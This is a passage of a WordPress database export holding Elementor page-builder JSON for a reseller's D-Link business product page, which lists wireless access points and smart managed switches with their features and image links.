segregation<\\/p><p>Access Control List (ACL) feature to enhances network security<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Built-in SNMP MIB for remote Network Management Systems<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7667,3424,'_wp_page_template','template-fullwidth.php'),(7668,3424,'_elementor_template_type','post'),(7669,3424,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ec8985\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":494,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"7a7732d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G 